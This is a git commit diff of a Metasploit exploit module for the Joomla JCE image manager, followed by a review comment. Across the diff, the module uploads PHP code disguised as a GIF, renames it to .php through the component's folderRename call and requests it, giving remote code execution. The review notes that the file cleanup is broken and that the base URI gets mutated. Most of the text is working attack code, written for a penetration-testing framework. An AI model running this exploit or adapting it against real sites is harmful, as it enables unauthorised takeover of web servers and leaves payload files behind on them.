many code adjustments

bug/bundler_fix
heyder 2013-03-22 23:07:08 -03:00
parent b5c65ad51b
commit 5bee1471df
1 changed files with 32 additions and 36 deletions


@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -56,17 +57,16 @@ class Metasploit3 < Msf::Exploit::Remote
def get_version def get_version
# check imgmanager version # check imgmanager version
@uri_base = normalize_uri(datastore['URI'], 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager') @uri_base = normalize_uri(datastore['URI']) + 'index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager'
uri = '' uri = @uri_base
uri << @uri_base
print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}") print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => uri, 'uri' => uri,
'method' => 'GET', 'method' => 'GET',
'version' => '1.1', 'version' => '1.1'
}, 25) })
if (res and res.code == 200) if (res and res.code == 200)
res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<}) res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
@ -95,39 +95,28 @@ class Metasploit3 < Msf::Exploit::Remote
@script_name = rand_text_alpha_lower(6) @script_name = rand_text_alpha_lower(6)
boundary = '-' * 27 + rand_text_numeric(11) boundary = '-' * 27 + rand_text_numeric(11)
uri = '' uri = @uri_base
uri << @uri_base
uri << '&method=form' uri << '&method=form'
# POST data # POST data
data = "--#{boundary}\r\n" post_data = Rex::MIME::Message.new
data << "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n" post_data.bound = boundary
data << "/\r\n" post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
data << "--#{boundary}\r\n" post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n" post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
data << "Content-Type: application/octet-stream\r\n\r\n" post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@script_name}.gif\"")
data << "\r\n" post_data.add_part("#{@script_name}", nil, nil, "form-data; name=\"upload-name\"")
data << "--#{boundary}\r\n" post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")
data << "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n"
data << "0\r\n" data = post_data.to_s
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@script_name}.gif\"\r\n"
data << "Content-Type: image/gif\r\n\r\n"
data << "#{cmd_php}\r\n"
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"upload-name\"\r\n\r\n"
data << "#{@script_name}\r\n"
data << "--#{boundary}\r\n"
data << "Content-Disposition: form-data; name=\"action\"\r\n\r\n"
data << "upload\r\n"
data << "--#{boundary}--\r\n\r\n"
res = send_request_cgi({ res = send_request_cgi({
'uri' => uri, 'uri' => uri,
'method' => 'POST', 'method' => 'POST',
'version' => '1.1', 'version' => '1.1',
'data' => data, 'data' => data,
'ctype' => 'multipart/form-data; boundary=' + boundary 'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
}, 25) })
if (res and res.code = 200 ) if (res and res.code = 200 )
return :access_denied if (res.body =~ /RESTRICTED/i) return :access_denied if (res.body =~ /RESTRICTED/i)
@ -143,8 +132,8 @@ class Metasploit3 < Msf::Exploit::Remote
def renamed? def renamed?
# Rename the file from .gif to .php # Rename the file from .gif to .php
uri = '' # uri = ''
uri << @uri_base uri = @uri_base
uri << '&version=1576&cid=20' uri << '&version=1576&cid=20'
data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@script_name}.gif\",\"#{@script_name}.php\"]}" data = "json={\"fn\":\"folderRename\",\"args\":[\"/#{@script_name}.gif\",\"#{@script_name}.php\"]}"
@ -162,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote
{ {
'X-Request' => 'JSON' 'X-Request' => 'JSON'
} }
}, 25) })
if (res and res.code == 200 ) if (res and res.code == 200 )
print_good("Renamed #{@script_name}.gif to #{@script_name}.php") print_good("Renamed #{@script_name}.gif to #{@script_name}.php")
return true return true
@ -177,9 +166,15 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Calling payload: #{@script_name}.php") print_status("Calling payload: #{@script_name}.php")
uri = normalize_uri(datastore['URI']) uri = normalize_uri(datastore['URI'])
uri << directory + @script_name + ".php" uri << directory + @script_name + ".php"
res = send_request_raw({ res = send_request_cgi({
'uri' => uri 'uri' => uri,
}, 25) 'method' => 'GET',
'version' => '1.1'
})
end
def on_new_session
# on_new_session will force stdapi to load (for Linux meterpreter)
end end
def exploit def exploit
@ -188,6 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
if upload_gif == :success if upload_gif == :success
if renamed? if renamed?
call_payload call_payload
register_files_for_cleanup(@script_name)
end end
end end
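Review bot: The cleanup added in the last hunk will not remove the uploaded file, because `register_files_for_cleanup(@script_name)` registers the bare name while the file left behind after `renamed?` is `#{@script_name}.php`. The call also runs only after `call_payload` has sent the request, which may be too late for the registration to be seen when the session opens. The new empty `def on_new_session` takes no argument and never calls `super`, so it shadows the hook that, as far as I know, `Msf::Exploit::FileDropper` relies on to delete registered files. I would call `register_files_for_cleanup("#{@script_name}.php")` before `call_payload`, and either drop the override or write it as `def on_new_session(client)` with a `super` call, so the tested host is not left with a stray PHP file. Separately, `uri = @uri_base` followed by `uri << '&method=form'` (and `uri << '&version=1576&cid=20'` in `renamed?`) now appends to `@uri_base` itself; `uri = @uri_base.dup` keeps the base unchanged between requests.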